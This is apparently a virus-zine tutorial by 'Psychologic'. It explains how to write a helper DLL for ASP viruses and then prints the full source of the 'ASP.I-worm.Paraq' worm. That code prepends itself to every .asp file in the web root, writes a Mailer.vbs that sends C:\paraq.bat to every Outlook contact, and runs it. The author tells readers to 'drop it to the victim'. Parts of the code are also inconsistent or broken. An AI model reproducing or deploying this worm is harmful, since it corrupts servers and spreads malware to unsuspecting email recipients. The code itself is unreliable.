ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ASP.Paraq ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Intro : Have you read my article about "Litle bit about asp virus" ?, if not yet , go read it, because, in this virus Ill try to solve the probleme about asp virus. Psychologic's theorema : Well, you know, I have a problem to read virus independent virtual path when I code asp virus, and I think this is my way to fix the problem. How to read independent virtual path in it ? Ok, we know that ASP didn't give us a "SYNTAX" for it, but we can make it by ourself, how? ok, we have to make one server component to help us , we need dll file that containing simple module to read asp virtual path. For most easy sample how to make that dll file under VB. Now Make your project in VB and choose ActiveX DLL , and changes the project name as "TotalPath" for example.Done ? And Changes Class Modules name as "LookAtPath" For Example.Done? Add the reference of Asp.Dll By Choosing Project >> References and then Choose the "Microsoft Active Server Page Object Library" Done? Put this code : ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Private m_scriptingcontext As ScriptingContext Public Sub onstartpage(thescriptingcontext As ScriptingContext) Set m_scriptingcontext = thescriptingcontext End Sub Public Sub display() Dim myrequest As Request Dim myresponse As Response Set myrequest = m_scriptingcontext.Request Set myresponse = m_scriptingcontext.Response myresponse.Write (myrequest.ServerVariables("PATH_TRANSLATED")) End Sub ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ If done, Compile your Project As : C:\windows\system\TotalPath.dll Now How to use it ? Yeahh... This is a silly Asp that will show you real path of your Asp ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ <html><title>Asp.Virpath By Psychologic</title><body> <% set test = server.CreateObject("TotalPath.LookAtPath") test.display %> </body></html> ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ "TotalPath.LookAtPath" : TotalPath is Our Filename & LooAtPath is our Module name. And now, you just need to insert that dll file in your virus and drop it to the victim.See this I-worm.paraq for sample : ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Paraq source code : ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ***************************************************************************************************************************** <!--.:Asp.Paraq:.--> <html><head><title>Bat/ASP.I-worm.Paraq</title> <body>Bat/asp.I-worm.Paraq<br>By Psychologic aka Puppy<br> psychologic@hotmail.com<br><br><br>Well... This is perfect Independent Asp virus<br> <% Response.Write "Dear user..<br>Your server has been Infected by Paraq virus<br>" Response.Write "The first Independent Asp virus<br>This virus made by someone under Psychologic handle<br>" Response.Write "Please update your antivirus product and clean this paraq now<br>The Author of this Malware<br>" Response.Write "Is never spreading his virus, He just publish it without spread it<br>Maybe someone stupid did it.<br>-Indonesia-" Set fso = Server.CreateObject("Scripting.FileSystemObject") Set Drives=fso.drives a = Server.CreateObject("virtualpath.lookpath") Set dropper = Fso.opentextfile(a,1,true) src = dropper.readall dropper.close Set Folder=fso.getfolder("C:\InetPub\wwwRoot") Set Files = folder.files For Each File in files If fso.GetExtensionName(file.path)="asp" then on error resume next Set reader = Fso.opentextfile(file.path,1, True) readman = reader.readline if reader <> "<!--.:Asp.Paraq:.-->" then Set Scripts = fso.OpenTextFile(file.path, 1, True) ScriptsSource = Scripts.ReadAll Set WriteScripts = FSO.OpenTextFile(file.path, 2, True) WriteScripts.WriteLine src WriteScripts.WriteLine ScriptsSource end if end If Next Set Subfolders = folder.SubFolders For Each Subfolder in Subfolders If fso.GetExtensionName(file.path)="asp" then on error resume next Set reader = Fso.opentextfile(file.path,1, True) readman = reader.readline if reader <> "<!--.:Bat.Asp.Paraq:.-->" then Set Scripts = FSO.OpenTextFile(file.path, 1, True) ScriptsSource = Scripts.ReadAll Set WriteScripts = FSO.OpenTextFile(file.path, 2, True) WriteScripts.WriteLine src WriteScripts.WriteLine ScriptsSource end if end If Next Set Mailer = fso.CreateTextFile("C:\Mailer.vbs") Mailer.Write "On error resume next" & vbcrlf Mailer.Write "Set Fso=CreateObject(" & chr(34) & "Scripting.FileSystemObject" & chr(34) & ")" & vbcrlf Mailer.Write "Set aaaaaaaa=CreateObject(" & chr(34) & "Outlook.Application" & chr(34) & ")" & vbcrlf Mailer.Write "Set aaaaaaaa=aaaaaaaa.GetNameSpace(" & chr(34) & "MAPI"" & chr(34) & )" & vbcrlf Mailer.Write "For Each C In aaaaaaaa.AddressLists" & vbcrlf Mailer.Write "If C.AddressEntries.Count <> 0 Then" & vbcrlf Mailer.Write "For D=1 To C.AddressEntries.Count" & vbcrlf Mailer.Write "Set aaaaaaaa=C.AddressEntries(D)" & vbcrlf Mailer.Write "Set aaaaaaaa=aaaaaaaa.CreateItem(0)" & vbcrlf Mailer.Write "aaaaaaaa.To=aaaaaaaa.Address" & vbcrlf Mailer.Write "aaaaaaaa.Subject=" & chr(34) & "Asp Paraq" & chr(34) & vbcrlf Mailer.Write "aaaaaaaa.Body=" & chr(34) & "Stop asking what is this,just checkout the attachment" & chr(34) & vbcrlf Mailer.Write "aaaaaaaa.Attachments.Add(" & chr(34) & "C:\paraq.bat" & chr(34) & ")" & vbcrlf Mailer.Write "aaaaaaaa.DeleteAfterSubmit=True" & vbcrlf Mailer.Write "If aaaaaaaa.To <> "" Then" & vbcrlf Mailer.Write "aaaaaaaa.Send" & vbcrlf Mailer.Write "End If" & vbcrlf Mailer.Write "Next" & vbcrlf Mailer.Write "End If" & vbcrlf Mailer.Write "Next" & vbcrlf Mailer.Close Set Executor = Server.CreateObject("Wscript.Shell") Executor.run "C:\Mailer.vbs" %> </body></html> *****************************************************************************************************************************